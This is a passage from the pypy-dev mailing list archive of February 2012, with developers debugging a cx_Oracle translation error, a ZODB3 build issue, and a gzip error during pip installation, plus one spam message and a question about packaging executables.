"/home/user/Desktop/pypy/pypy/rpython/annlowlevel.py", line 259, in > > finish_annotate > > [translation:ERROR] ann.complete_helpers(self.policy) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 180, in > > complete_helpers > > [translation:ERROR] self.complete() > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 254, in > > complete > > [translation:ERROR] self.processblock(graph, block) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 452, in > > processblock > > [translation:ERROR] self.flowin(graph, block) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 512, in > flowin > > [translation:ERROR] self.consider_op(block.operations[i]) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 714, in > > consider_op > > [translation:ERROR] raise_nicer_exception(op, str(graph)) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 711, in > > consider_op > > [translation:ERROR] resultcell = consider_meth(*argcells) > > [translation:ERROR] File "<4506-codegen > > /home/user/Desktop/pypy/pypy/annotation/annrpython.py:749>", line 3, in > > consider_op_simple_call > > [translation:ERROR] return arg.simple_call(*args) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/unaryop.py", line 175, in > > simple_call > > [translation:ERROR] return > > obj.call(getbookkeeper().build_args("simple_call", args_s)) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/unaryop.py", line 706, in call > > [translation:ERROR] return bookkeeper.pbc_call(pbc, args) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/bookkeeper.py", line 668, in > > pbc_call > > [translation:ERROR] results.append(desc.pycall(schedule, args, > > s_previous_result, op)) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/description.py", line 976, in > > pycall > > [translation:ERROR] return self.funcdesc.pycall(schedule, args, > > s_previous_result, op) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/description.py", line 297, in > > pycall > > [translation:ERROR] result = schedule(graph, inputcells) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/bookkeeper.py", line 664, in > > schedule > > [translation:ERROR] return self.annotator.recursivecall(graph, > whence, > > inputcells) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 395, in > > recursivecall > > [translation:ERROR] position_key) > > [translation:ERROR] File > > "/home/user/Desktop/pypy/pypy/annotation/annrpython.py", line 235, in > > addpendingblock > > [translation:ERROR] assert annmodel.unionof(s_oldarg, s_newarg) == > > s_oldarg > > [translation:ERROR] AssertionError': > > [translation:ERROR] .. v2309 = simple_call(v2301, v2302, v2303, > v2304, > > v2305, v2306, v2307, v2308) > > [translation:ERROR] .. > > '(pypy.module.pypyjit.policy:49)PyPyJitIface._compile_hook' > > [translation:ERROR] Processing block: > > [translation:ERROR] block at 226 is a > 'pypy.objspace.flow.flowcontext.SpamBlock'> > > [translation:ERROR] in > > (pypy.module.pypyjit.policy:49)PyPyJitIface._compile_hook > > [translation:ERROR] containing the following operations: > > [translation:ERROR] v2309 = simple_call(v2301, v2302, v2303, > v2304, > > v2305, v2306, v2307, v2308) > > [translation:ERROR] --end-- > > _______________________________________________ > > pypy-dev mailing list > > pypy-dev at python.org > > http://mail.python.org/mailman/listinfo/pypy-dev > > > > Hi Philip. > > This is a bit problematic without installing oracle. Can you run this > again and while in pdb say what s_oldarg and s_newarg is? > -------------- next part -------------- An HTML attachment was scrubbed... URL: From fijall at gmail.com Mon Feb 27 19:12:46 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Mon, 27 Feb 2012 10:12:46 -0800 Subject: [pypy-dev] Translation Error building with cx_Oracle In-Reply-To: References: Message-ID: On Mon, Feb 27, 2012 at 9:39 AM, Phillip Class wrote: > Hi Maciej, > > In Pdb they look like this: > > [translation] start debugger... >> >> /home/user/Desktop/pypy/pypy/annotation/annrpython.py(235)addpendingblock() > -> assert annmodel.unionof(s_oldarg, s_newarg) == s_oldarg > (Pdb+) s_oldarg > SomeInstance(can_be_None=False, > classdef=pypy.objspace.std.intobject.W_IntObject) > (Pdb+) s_newarg > SomeInstance(can_be_None=False, > classdef=pypy.objspace.std.stringobject.W_StringObject) This is so obscure..... Temporarily you can go and disable those functions by going to pypy/module/pypyjit/__init__.py and commenting out 3 lines with set_compile_hook, set_optimize_hook and set_abort_hook. I'm looking into the actual solution in the meantime. Cheers, fijal From fijall at gmail.com Mon Feb 27 20:07:06 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Mon, 27 Feb 2012 11:07:06 -0800 Subject: [pypy-dev] Translation Error building with cx_Oracle In-Reply-To: References: Message-ID: On Mon, Feb 27, 2012 at 10:12 AM, Maciej Fijalkowski wrote: > On Mon, Feb 27, 2012 at 9:39 AM, Phillip Class > wrote: >> Hi Maciej, >> >> In Pdb they look like this: >> >> [translation] start debugger... >>> >>> /home/user/Desktop/pypy/pypy/annotation/annrpython.py(235)addpendingblock() >> -> assert annmodel.unionof(s_oldarg, s_newarg) == s_oldarg >> (Pdb+) s_oldarg >> SomeInstance(can_be_None=False, >> classdef=pypy.objspace.std.intobject.W_IntObject) >> (Pdb+) s_newarg >> SomeInstance(can_be_None=False, >> classdef=pypy.objspace.std.stringobject.W_StringObject) > > This is so obscure..... > > Temporarily you can go and disable those functions by going to > pypy/module/pypyjit/__init__.py and commenting out 3 lines with > set_compile_hook, set_optimize_hook and set_abort_hook. I'm looking > into the actual solution in the meantime. > > Cheers, > fijal Hi Philip Can you paste the entire output somewhere? From phillip.d.class at gmail.com Mon Feb 27 20:16:04 2012 From: phillip.d.class at gmail.com (Phillip Class) Date: Mon, 27 Feb 2012 19:16:04 +0000 Subject: [pypy-dev] Translation Error building with cx_Oracle In-Reply-To: References: Message-ID: Hi Maciej, It's very big but here is the entire thing: http://pastebin.com/MkmHPBAU Thanks, Phil On Mon, Feb 27, 2012 at 7:07 PM, Maciej Fijalkowski wrote: > On Mon, Feb 27, 2012 at 10:12 AM, Maciej Fijalkowski > wrote: > > On Mon, Feb 27, 2012 at 9:39 AM, Phillip Class > > wrote: > >> Hi Maciej, > >> > >> In Pdb they look like this: > >> > >> [translation] start debugger... > >>> > >>> > /home/user/Desktop/pypy/pypy/annotation/annrpython.py(235)addpendingblock() > >> -> assert annmodel.unionof(s_oldarg, s_newarg) == s_oldarg > >> (Pdb+) s_oldarg > >> SomeInstance(can_be_None=False, > >> classdef=pypy.objspace.std.intobject.W_IntObject) > >> (Pdb+) s_newarg > >> SomeInstance(can_be_None=False, > >> classdef=pypy.objspace.std.stringobject.W_StringObject) > > > > This is so obscure..... > > > > Temporarily you can go and disable those functions by going to > > pypy/module/pypyjit/__init__.py and commenting out 3 lines with > > set_compile_hook, set_optimize_hook and set_abort_hook. I'm looking > > into the actual solution in the meantime. > > > > Cheers, > > fijal > > Hi Philip > > Can you paste the entire output somewhere? > -------------- next part -------------- An HTML attachment was scrubbed... URL: From fijall at gmail.com Mon Feb 27 20:18:27 2012 From: fijall at gmail.com (Maciej Fijalkowski) Date: Mon, 27 Feb 2012 11:18:27 -0800 Subject: [pypy-dev] Translation Error building with cx_Oracle In-Reply-To: References: Message-ID: On Mon, Feb 27, 2012 at 11:16 AM, Phillip Class wrote: > Hi Maciej, > > It's very big but here is the entire thing: > http://pastebin.com/MkmHPBAU > > Thanks, > > Phil On the unrelated note, you might want to install libbz2 and ncurses ;-) > > > On Mon, Feb 27, 2012 at 7:07 PM, Maciej Fijalkowski > wrote: >> >> On Mon, Feb 27, 2012 at 10:12 AM, Maciej Fijalkowski >> wrote: >> > On Mon, Feb 27, 2012 at 9:39 AM, Phillip Class >> > wrote: >> >> Hi Maciej, >> >> >> >> In Pdb they look like this: >> >> >> >> [translation] start debugger... >> >>> >> >>> >> >>> /home/user/Desktop/pypy/pypy/annotation/annrpython.py(235)addpendingblock() >> >> -> assert annmodel.unionof(s_oldarg, s_newarg) == s_oldarg >> >> (Pdb+) s_oldarg >> >> SomeInstance(can_be_None=False, >> >> classdef=pypy.objspace.std.intobject.W_IntObject) >> >> (Pdb+) s_newarg >> >> SomeInstance(can_be_None=False, >> >> classdef=pypy.objspace.std.stringobject.W_StringObject) >> > >> > This is so obscure..... >> > >> > Temporarily you can go and disable those functions by going to >> > pypy/module/pypyjit/__init__.py and commenting out 3 lines with >> > set_compile_hook, set_optimize_hook and set_abort_hook. I'm looking >> > into the actual solution in the meantime. >> > >> > Cheers, >> > fijal >> >> Hi Philip >> >> Can you paste the entire output somewhere? > > From arigo at tunes.org Tue Feb 28 09:13:21 2012 From: arigo at tunes.org (Armin Rigo) Date: Tue, 28 Feb 2012 09:13:21 +0100 Subject: [pypy-dev] Translation Error building with cx_Oracle In-Reply-To: References: Message-ID: Hi, On Mon, Feb 27, 2012 at 18:39, Phillip Class wrote: >> /home/user/Desktop/pypy/pypy/annotation/annrpython.py(235)addpendingblock() > -> assert annmodel.unionof(s_oldarg, s_newarg) == s_oldarg > (Pdb+) s_oldarg > SomeInstance(can_be_None=False, > classdef=pypy.objspace.std.intobject.W_IntObject) > (Pdb+) s_newarg > SomeInstance(can_be_None=False, > classdef=pypy.objspace.std.stringobject.W_StringObject) Ah, I see why. It's some random argument to space.call_function(cache.w_compile_hook, <6 arguments>). It turns out that in module/oracle/transform.py there is also another call to space.call_function() with 7 arguments. The two conflict because they are not annotated at the same time. I can write a test, probably. Armin From asouzaleite at gmx.de Tue Feb 28 10:09:43 2012 From: asouzaleite at gmx.de (Aroldo Souza-Leite) Date: Tue, 28 Feb 2012 10:09:43 +0100 Subject: [pypy-dev] ZODB3 In-Reply-To: References: <4F4B5296.6050903@gmx.de> Message-ID: <4F4C99D7.3050407@gmx.de> Hi Armin, hi Maciej, hi list, thanks, I'll try and take the issue to the zodb-dev at zope.org. Cheers. Aroldo. Am 27.02.2012 16:48, schrieb Armin Rigo: > Hi, > > On Mon, Feb 27, 2012 at 16:29, Maciej Fijalkowski wrote: >> On PyPy it probably should not do anything so you can maybe try with >> #define _Py_ForgetReference(obj), but I don't actually know. > Yes, it looks like it doesn't do anything in release builds of > CPython. It's there for debugging. > > > A bient?t, > > Armin. From arigo at tunes.org Tue Feb 28 10:42:10 2012 From: arigo at tunes.org (Armin Rigo) Date: Tue, 28 Feb 2012 10:42:10 +0100 Subject: [pypy-dev] ZODB3 In-Reply-To: <4F4C99D7.3050407@gmx.de> References: <4F4B5296.6050903@gmx.de> <4F4C99D7.3050407@gmx.de> Message-ID: Hi, On Tue, Feb 28, 2012 at 10:09, Aroldo Souza-Leite wrote: > thanks, I'll try and take the issue to the zodb-dev at zope.org. Ah, that's not what I meant. I meant that we can just add a do-nothing _Py_ForgetReference in PyPy and be done. A bient?t, Armin. From asouzaleite at gmx.de Tue Feb 28 10:55:47 2012 From: asouzaleite at gmx.de (Aroldo Souza-Leite) Date: Tue, 28 Feb 2012 10:55:47 +0100 Subject: [pypy-dev] ZODB3 In-Reply-To: References: <4F4B5296.6050903@gmx.de> <4F4C99D7.3050407@gmx.de> Message-ID: <4F4CA4A3.40100@gmx.de> Hi, Am 28.02.2012 10:42, schrieb Armin Rigo: > Hi, > > On Tue, Feb 28, 2012 at 10:09, Aroldo Souza-Leite wrote: >> thanks, I'll try and take the issue to the zodb-dev at zope.org. > Ah, that's not what I meant. I meant that we can just add a > do-nothing _Py_ForgetReference in PyPy and be done. > > > A bient?t, > > Armin. Oh, does that mean that this problem could be solved by the PyPy people? Cheers. Aroldo. From arigo at tunes.org Tue Feb 28 13:44:45 2012 From: arigo at tunes.org (Armin Rigo) Date: Tue, 28 Feb 2012 13:44:45 +0100 Subject: [pypy-dev] ZODB3 In-Reply-To: <4F4CA4A3.40100@gmx.de> References: <4F4B5296.6050903@gmx.de> <4F4C99D7.3050407@gmx.de> <4F4CA4A3.40100@gmx.de> Message-ID: Hi, On Tue, Feb 28, 2012 at 10:55, Aroldo Souza-Leite wrote: > Oh, does that mean that this problem could be solved by the PyPy people? Yes. Fixed in b741ab752493. The easiest is to wait for next night's automatic builds, but you can also try it out directly by replacing the file Include/object.h with the latest version of https://bitbucket.org/pypy/pypy/raw/default/pypy/module/cpyext/include/object.h . A bient?t, Armin. From pa.basso at gmail.com Wed Feb 29 09:57:51 2012 From: pa.basso at gmail.com (Paolo Basso) Date: Wed, 29 Feb 2012 09:57:51 +0100 Subject: [pypy-dev] pypy2exe Message-ID: Perhaps this will sound like a newbie question but IMHO a lot of people would benefit of some clarification and more info.... Here's the point: what if I want to build an executable using pypy (possibly with a GUI)? I'm not a pro of course, but with cpython I'm able to do it quite easily thanks to py2exe and many GUI frameworks (Qt also comes with a designer). Is there or will be there something like a pypy2exe or already exists a step by step guide I missed? May be rpythonic (http://code.google.com/p/rpythonic/) useful? I apologize if this is the wrong place to discuss such a topic, I can post the question in a better context if you redirect me... Cheers, Paolo -------------- next part -------------- An HTML attachment was scrubbed... URL: From affleck.m at gmail.com Wed Feb 29 18:15:44 2012 From: affleck.m at gmail.com (Affleck, Melanie) Date: Wed, 29 Feb 2012 18:15:44 +0100 Subject: [pypy-dev] web_review Message-ID: <36256051.20120229181544@gmail.com> Dear Pypy-dev, We will review your site and your web placement, at no-cost to you, now. Reply today for your complimentary analysis. Sincerely, Melanie Affleck Interplay_Marketing pypy-dev at codespeak.net 2/29/2012 From asouzaleite at gmx.de Wed Feb 29 18:56:01 2012 From: asouzaleite at gmx.de (Aroldo Souza-Leite) Date: Wed, 29 Feb 2012 18:56:01 +0100 Subject: [pypy-dev] pip In-Reply-To: <36256051.20120229181544@gmail.com> References: <36256051.20120229181544@gmail.com> Message-ID: <4F4E66B1.8020205@gmx.de> Hi list, I'm getting an error when trying to easy_install pip in PyPy (nightly build). The error doesn't occur in PyPy-1.8. Thanks. Aroldo. ------- (pypy)root at aroldo-laptop:/opt/pypy/bin# which python /opt/pypy//bin/python (pypy)root at aroldo-laptop:/opt/pypy/bin# which easy_install /opt/pypy//bin/easy_install (pypy)root at aroldo-laptop:/opt/pypy/bin# easy_install pip ... Adding pip 1.1 to easy-install.pth file Installing pip script to /opt/pypy/bin Installing pip-2.7 script to /opt/pypy/bin Installed /opt/pypy-c-jit-53000-836fcc2fe8d8-linux/site-packages/pip-1.1-py2.7. egg Processing dependencies for pip Finished processing dependencies for pip Traceback (most recent call last): File "app_main.py", line 51, in run_toplevel File "/opt/pypy/lib-python/2.7/gzip.py", line 371, in flush self._check_closed() File "/opt/pypy/lib-python/2.7/gzip.py", line 146, in _check_closed raise ValueError('I/O operation on closed file.') ValueError: I/O operation on closed file. (pypy)root at aroldo-laptop:/opt/pypy/bin# From alex.gaynor at gmail.com Wed Feb 29 18:59:39 2012 From: alex.gaynor at gmail.com (Alex Gaynor) Date: Wed, 29 Feb 2012 12:59:39 -0500 Subject: [pypy-dev] pip In-Reply-To: <4F4E66B1.8020205@gmx.de> References: <36256051.20120229181544@gmail.com> <4F4E66B1.8020205@gmx.de> Message-ID: On Wed, Feb 29, 2012 at 12:56 PM, Aroldo Souza-Leite wrote: > Hi list, > > I'm getting an error when trying to easy_install pip in PyPy (nightly > build). The error doesn't occur in PyPy-1.8. > > Thanks. > > Aroldo. > > ------- > > (pypy)root at aroldo-laptop:/opt/**pypy/bin# which python > /opt/pypy//bin/python > (pypy)root at aroldo-laptop:/opt/**pypy/bin# which easy_install > /opt/pypy//bin/easy_install > > (pypy)root at aroldo-laptop:/opt/**pypy/bin# easy_install pip > ... > Adding pip 1.1 to easy-install.pth file > Installing pip script to /opt/pypy/bin > Installing pip-2.7 script to /opt/pypy/bin > > Installed /opt/pypy-c-jit-53000-**836fcc2fe8d8-linux/site-** > packages/pip-1.1-py2.7. > egg > Processing dependencies for pip > Finished processing dependencies for pip > Traceback (most recent call last): > File "app_main.py", line 51, in run_toplevel > File "/opt/pypy/lib-python/2.7/**gzip.py", line 371, in flush > self._check_closed() > File "/opt/pypy/lib-python/2.7/**gzip.py", line 146, in _check_closed > raise ValueError('I/O operation on closed file.') > ValueError: I/O operation on closed file. > (pypy)root at aroldo-laptop:/opt/**pypy/bin# > ______________________________**_________________ > pypy-dev mailing list > pypy-dev at python.org > http://mail.python.org/**mailman/listinfo/pypy-dev > I ran into this recently and just ignored it, it seemed to work ok. However, I'm guessing it's a result of d4dee87e47cc. Alex -- "I disapprove of what you say, but I will defend to the death your right to say it." -- Evelyn Beatrice Hall (summarizing Voltaire) "The people's good is the highest law." -- Cicero -------------- next part -------------- An HTML attachment was scrubbed... URL: From anto.cuni at gmail.com Wed Feb 29 23:01:46 2012 From: anto.cuni at gmail.com (Antonio Cuni) Date: Wed, 29 Feb 2012 23:01:46 +0100 Subject: [pypy-dev] pip In-Reply-To: References: <36256051.20120229181544@gmail.com> <4F4E66B1.8020205@gmx.de> Message-ID: <4F4EA04A.1040000@gmail.com> On 02/29/2012 06:59 PM, Alex Gaynor wrote: > I ran into this recently and just ignored it, it seemed to work ok. However, > I'm guessing it's a result of d4dee87e47cc. it's, it's probably because of the autoflush. It should be fixed by f9f3b57f1300 which I just pushed, so tomorrow's nightly should already work well. ciao, anto